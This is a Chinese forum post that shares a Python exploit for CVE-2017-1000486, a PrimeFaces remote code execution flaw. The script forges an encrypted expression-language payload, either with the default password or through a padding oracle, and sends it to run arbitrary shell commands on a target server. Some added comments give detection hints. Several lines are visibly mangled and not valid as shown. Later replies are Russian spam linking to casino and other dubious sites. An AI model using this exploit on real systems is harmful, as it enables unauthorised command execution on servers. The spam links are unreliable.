(福利)CVE-2017-1000486 密码攻击poc (环境 python3)

发表于 2020-3-17 17:15:50 | 显示全部楼层 |阅读模式
话不多说!直接上 poc

from paddingoracle import BadPaddingException, PaddingOracle
# from base64 import b64encode, b64decode
# from urllib import quote, unquote
import requests
from Crypto.Hash import MD5
from Crypto.Cipher import DES
import base64
import socket
import time
import logging
import argparse

class PadBuster(PaddingOracle):
    """HTTP oracle for the PrimeFaces ``pfdrid`` parameter.

    Subclasses the third-party ``paddingoracle.PaddingOracle``; the base
    class is presumably what drives the block-by-block queries and calls
    :meth:`oracle` for each candidate.  ``target``, ``proxies`` and
    ``headers`` are *not* initialised here -- the caller assigns them as
    plain attributes before use (see ``exploit_paddingoracle``).
    """

    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        # One keep-alive session for the whole run.
        self.session = requests.Session()
        # Process-wide: silences the urllib3 warnings that ``verify=False`` triggers.
        requests.packages.urllib3.disable_warnings()
        # Seconds to sleep between retries after a transport-level failure.
        self.wait = kwargs.get('wait', 2.0)

    def oracle(self, data, **kwargs):
        """Classify one candidate ciphertext by the server's HTTP status.

        Sends ``data`` (base64) as ``pfdrid`` in a POST with the two fixed
        PrimeFaces resource fields.  An HTTP 500 makes the method return
        normally; any other status raises ``BadPaddingException``.  The
        inline comment on the 500 branch and the log message there disagree
        on which status means "padding error" -- confirm against the
        library's convention before relying on either reading.

        Detection note: from the server side this loop looks like a rapid
        series of POSTs to one resource path with ``pfdrt=sc`` and
        ``ln=primefaces`` that differ only in ``pfdrid``, with the response
        status flipping between 500 and non-500.
        """
        payload = base64.b64encode(data)

        while 1:
            try:
                post_params = {'pfdrt':'sc', 'ln':'primefaces', 'pfdrid': payload}
                # TLS verification is disabled; 5 s per-request timeout.
                response = self.session.post(self.target, data=post_params, stream=False, timeout=5, verify=False, proxies=self.proxies, headers=self.headers)
                break
            except (socket.error, requests.exceptions.RequestException):
                # Unbounded retry: an unreachable target keeps this looping forever.
                logging.exception('Retrying request in %.2f seconds...', self.wait)
                time.sleep(self.wait)
                continue

        # ``history`` is presumably created by the PaddingOracle base class -- confirm.
        self.history.append(response)

        # An HTTP 500 error was returned, likely due to incorrect padding
        if response.status_code == 500:
            # NOTE(review): ``logging.exception`` outside an ``except`` block
            # attaches a spurious "NoneType: None" traceback; ``logging.debug``
            # is what a log line without an active exception should use.
            logging.exception('No padding exception raised on %r', payload)
            return

        raise BadPaddingException


# Expression-language payload carried (encrypted) in ``pfdrid``.  It is a
# fixed string: the command to run is not embedded here but read at request
# time from the ``cmd`` POST parameter (the ``request.getParameter("cmd")``
# calls below), which is why ``exploit`` and ``exploit_paddingoracle`` add a
# ``cmd`` field next to the three standard PrimeFaces resource parameters.
# Detection note: legitimate dynamic-content resource requests have no reason
# to carry a ``cmd`` parameter, so its presence on a POST to that resource
# path is a cheap, low-noise indicator in access logs or WAF rules.
payloadEL =  '${session.setAttribute("scriptfactory",facesContext.getExternalContext().getClass().getClassLoader().loadClass("javax.script.ScriptEngineManager").newInstance())}'
payloadEL += '${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}'
payloadEL += '${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}'
payloadEL += '${session.getAttribute("scriptengine").eval('
payloadEL += '"var os = java.lang.System.getProperty(\\"os.name\\");'
payloadEL += 'var proc = null;'
payloadEL += 'os.toLowerCase().contains(\\"win\\")? '
payloadEL += 'proc = new java.lang.ProcessBuilder[\\"(java.lang.String[])\\"]([\\"cmd.exe\\",\\"/C\\",\\"".concat(request.getParameter("cmd")).concat("\\"]).start()'
payloadEL += ' : proc = new java.lang.ProcessBuilder[\\"(java.lang.String[])\\"]([\\"/bin/sh\\",\\"-c\\",\\"").concat(request.getParameter("cmd")).concat("\\"]).start();'
payloadEL += 'var is = proc.getInputStream();'
payloadEL += 'var sc = new java.util.Scanner(is,\\"UTF-8\\"); var out = \\"\\";'
payloadEL += 'while(sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);}print(out);"))}'
payloadEL += '${facesContext.getExternalContext().getResponse().getWriter().flush()}'
payloadEL += '${facesContext.getExternalContext().getResponse().getWriter().close()}';


def get_args():
    """Parse the command line and return the resulting ``argparse`` namespace.

    Exactly one positional argument (``target``) is required; every option
    has a string default, so callers may ``.strip()`` any attribute without
    a ``None`` check.  ``--oracle`` is a plain string as well -- ``main``
    compares it against ``"0"`` rather than treating it as a boolean.
    """
    epilog = '''
                       This script exploits an expression language remote code execution flaw in the Primefaces JSF framework.
                       Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack,
                       due to the use of weak crypto and default encryption password and salt.
                      '''
    parser = argparse.ArgumentParser(
        prog="primefaces.py",
        formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
        epilog=epilog,
    )

    # (flags, add_argument keyword arguments), in --help order.
    option_specs = [
        (("target",), dict(help="Target Host")),
        (("-pw", "--password"), dict(default="primefaces", help="Primefaces Password (Default = primefaces")),
        (("-pt", "--path"), dict(default="/javax.faces.resource/dynamiccontent.properties.xhtml", help="Path to dynamiccontent.properties (Default = /javax.faces.resource/dynamiccontent.properties.xhtml)")),
        (("-c", "--cmd"), dict(default="whoami", help="Command to execute. (Default = whoami)")),
        (("-px", "--proxy"), dict(default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (Default = None)")),
        (("-ck", "--cookie"), dict(default="", help="Configure a cookie in the format 'COOKIE=VALUE; COOKIE2=VALUE2;' (Default = None)")),
        (("-o", "--oracle"), dict(default="0", help="Exploit the target with Padding Oracle. Use 1 to activate. (Default = 0) (SLOW)")),
        (("-pl", "--payload"), dict(default="", help="EL Encrypted payload. That function is meant to be used with the Padding Oracle generated payload. (Default = None) ")),
    ]
    for flags, spec in option_specs:
        parser.add_argument(*flags, **spec)

    return parser.parse_args()


"""Mimic Java's PBEWithMD5AndDES algorithm used by Primefaces"""
def encrypt(data, password):
    """Encrypt ``data`` the way PrimeFaces' PBEWithMD5AndDES wrapper does.

    Key derivation: MD5 over ``password`` followed by the fixed 8-byte
    constant the code names ``iv`` (it is hashed in, i.e. it plays the PBE
    salt role), then re-hashed 18 more times (19 MD5 passes in total).
    Bytes 0-7 of the result become the DES key and bytes 8-15 the CBC IV.
    ``data`` is PKCS#5-padded first.  Returns
    ``str(base64.b64encode(ciphertext))``.

    Defensive reading: the salt constant and the iteration count are fixed
    by the framework and the password defaults to ``"primefaces"`` (see
    ``get_args``), so a deployment that keeps the default password has no
    confidentiality for ``pfdrid`` values at all; the only effective
    mitigation on the application side is upgrading and setting a
    non-default secret.

    NOTE(review): ``data`` and ``password`` are handled as ``str`` here
    (``chr(padding)`` is appended, ``password`` is hashed directly); with
    pycryptodome on Python 3 ``update``/``encrypt`` expect ``bytes`` -- confirm
    which interpreter this was actually run under.
    """
    # Padding clear-text using PKCS5 algo
    padding = 8 - len(data) % 8
    data += chr(padding) * padding
    # IV and "iterations count" extracted from primefaces sourcecode
    iterations = 19
    iv = b'\xa9\x9b\xc8\x32\x56\x34\xe3\x03'
    hasher = MD5.new()
    hasher.update(password)
    hasher.update(iv)
    result = hasher.digest()

    # range(1, 19) -> 18 further rounds on top of the first digest.
    for i in range(1, iterations):
        hasher = MD5.new()
        hasher.update(result)
        result = hasher.digest()

    cipher = DES.new(result[:8], DES.MODE_CBC, result[8:16])
    encrypted = cipher.encrypt(data)
    # NOTE(review): the next two lines are mangled in this paste -- the string
    # literal is split across a line break and the ``return`` is indented one
    # level deeper than the body -- so the block is not valid Python as shown.
    print ("
  • Generated Encrypted Payload: " + str(base64.b64encode(encrypted)))
        return str(base64.b64encode(encrypted))


    def exploit(target, path, cmd, password, proxy, cookie, payload=""):
        """Send one crafted request using a locally encrypted (or supplied) payload.

        ``password`` is only consulted when ``payload`` is empty, in which case
        ``encrypt(payloadEL, password)`` builds the ``pfdrid`` value; a
        non-empty ``payload`` is sent verbatim.  ``cmd`` travels as a separate
        POST field.  TLS verification is disabled and ``cookie`` is placed in
        the ``Cookie`` header unmodified.  Prints the response body or a
        "not vulnerable / non-default password" hint; returns nothing.

        NOTE(review): as pasted this ``def`` is indented one level, directly
        after ``encrypt``'s misplaced ``return``; in the original file it is
        presumably top-level.  The fixed, dated User-Agent string below is a
        usable log indicator for this specific tool.
        """
        requests.packages.urllib3.disable_warnings()
        proxies = {
            'http': proxy,
            'https': proxy
        }
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
            'Accept': '*/*',
            'Cookie': cookie
        }
        if payload == "":
          payload = encrypt(payloadEL, password)
        post_params = {'pfdrt':'sc', 'ln':'primefaces', 'pfdrid': payload, 'cmd' : cmd}
        # NOTE(review): string literal split across two lines in this paste.
        print ("
  • Attempting to execute: %s" % cmd)
        r = requests.post(target+path, data=post_params, verify=False, proxies=proxies, headers=headers)
        if r.text:
          print ("[+] Exploit Result:\n\n %s" % r.text)  
        else:
          print ("[-] Response body empty... Target might not be vulnerable or don't use default password... Try the padding oracle attack.")

    def exploit_paddingoracle(target, path, cmd, password, proxy, cookie):
        """Derive the ``pfdrid`` value through the padding oracle, then send it.

        Builds a ``PadBuster``, wires its ``proxies``/``headers``/``target``
        attributes, and calls ``padbuster.encrypt(payloadEL, block_size=8,
        iv=iv)`` -- presumably a ``PaddingOracle`` base-class method that
        forges ciphertext by querying the server rather than by knowing the
        key.  The result is then posted exactly as in ``exploit``.

        ``password`` is accepted but never used in this body: the whole point
        of this path is that the key is not needed.  Returns nothing.
        """
        padbuster = PadBuster()
        padbuster.proxies = {
            'http': proxy,
            'https': proxy
        }
        padbuster.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
            'Accept': '*/*',
            'Cookie': cookie
        }
        padbuster.target = target+path
        # Same 8-byte constant as in ``encrypt``; here it is passed as the CBC IV.
        iv = b'\xa9\x9b\xc8\x32\x56\x34\xe3\x03'
        payload = padbuster.encrypt(payloadEL, block_size=8, iv=iv)
        # Under Python 3 ``%s`` on bytes prints the ``b'...'`` repr, not the text.
        print ("[+] Using the following generated payload:\n\n %s" % base64.b64encode(payload))  
        # Already done in PadBuster.__init__; harmless repeat.
        requests.packages.urllib3.disable_warnings()
        # Duplicates ``padbuster.proxies`` built above.
        proxies = {'http': proxy, 'https': proxy}
        post_params = {'pfdrt':'sc', 'ln':'primefaces', 'pfdrid': base64.b64encode(payload), 'cmd' : cmd}
        # NOTE(review): string literal split across two lines in this paste.
        print ("
  • Attempting to execute: %s" % cmd)
        r = requests.post(target+path, data=post_params, verify=False, proxies=proxies, headers=padbuster.headers)
        # Debug output: dumps every response header.
        print(r.headers)
        if r.text:
          print ("[+] Exploit Result:\n\n %s" % r.text)  
        else:
          print ("[-] Response body empty... Target might not be vulnerable... :-(")

    def main():
        """Print the banner, parse arguments and dispatch to one of the two paths.

        ``--oracle`` is compared as a string: anything other than ``"0"``
        selects ``exploit_paddingoracle``; otherwise ``exploit`` is called
        with whatever ``--payload`` was given (possibly empty).  Every argument
        is ``.strip()``-ed first, which is safe because ``get_args`` gives
        each option a string default.  Returns nothing.
        """
        print ('')
        print ('========================================================================')
        print ('|     CVE-2017-1000486 - Primefaces Remote Code Execution Exploit      |')
        print ('|                               by pimps                               |')
        print ('========================================================================\n')

        args = get_args()
        if (args.oracle.strip() == "0"):
            if (args.payload.strip() == ""):
                # NOTE(review): the print literals in this function are split
                # across line breaks in this paste and are not valid Python as shown.
                print ("
  • Generating payload using default Password...")  
            else:
                print ("
  • Executing the exploit using a given Payload...")
            exploit(args.target.strip(),args.path.strip(),args.cmd.strip(), args.password.strip(), args.proxy.strip(), args.cookie.strip(), args.payload.strip())
        else:
            print ("
  • Generating payload with Padding Oracle Attack... (SLOW)")  
            exploit_paddingoracle(args.target.strip(),args.path.strip(),args.cmd.strip(), args.password.strip(), args.proxy.strip(), args.cookie.strip())


    # Script entry point (indented in this paste along with the preceding defs).
    if __name__ == '__main__':
      main()


    发表于 2021-2-19 04:30:23 | 显示全部楼层

    muzmo скачать бесплатно порно

    признаюсь, музмо ру 2020 новинки https://muzground.ru
    ex rye softly https://muzground.ru/
    发表于 2021-5-21 19:56:11 | 显示全部楼层

    casino x реальные отзывы

    по справедливости говоря для вас огромный выигрыш

    http://chimmed.ru/news/pages/igrovue_avtomatu_s_muzukalnoy_tematikoy.html
    https://triton-ltd.ru/slider/inc/kak_igrat_v_avtomatu_s_telefona_na_android_i_ios.html
    http://zakustom.ru/wp-includes/list/mobilnaya_versiya_onlayn_kazino_vulkan_1.html
    https://www.vitbichi.by/akcii/elem/mobilnaya_versiya_onlayn_kazino_vulkan_2.html
    http://rg62.info/news/kak_vubrat_igrovoy_avtomat_v_kazino_1.html
    http://xn--h1albh.xn--p1ai/wp-includes/pages/gde_nayti_rabochee_zerkalo_onlayn_k
    发表于 2021-6-9 18:31:00 | 显示全部楼层

    casino x 3000

    MonzaCrale ·±нУЪ 2021-5-21 19:56
    §б§а §г§б§в§С§У§Ц§Х§Э§Ъ§У§а§г§д§Ъ §Ф§а§У§а§в§с §Х§Э§с §У§С§г §а§Ф§в§а§Ю§Я§н§Ы §У§н§Ъ§Ф§в§н§к

    ht ...

    во всяком случае для вас азартный игрок

    http://www.ristrutturazioni-smart.it/component/k2/itemlist/user/970924
    http://krasnogorsk-makler.ru/realty/demand/76806
    http://old.ho4uletat.ru/coaches/irina-norna/otzivy/13801
    http://www.enjoycre.com/?option=com_k2&view=itemlist&task=user&id=1077064
    http://www.nafttech.com/component/k2/itemlist/user/1524169


    TL4kRi3x
    http://www.enjoycre.com/?option=com_k2&view=itemlist&task=user&id=1077064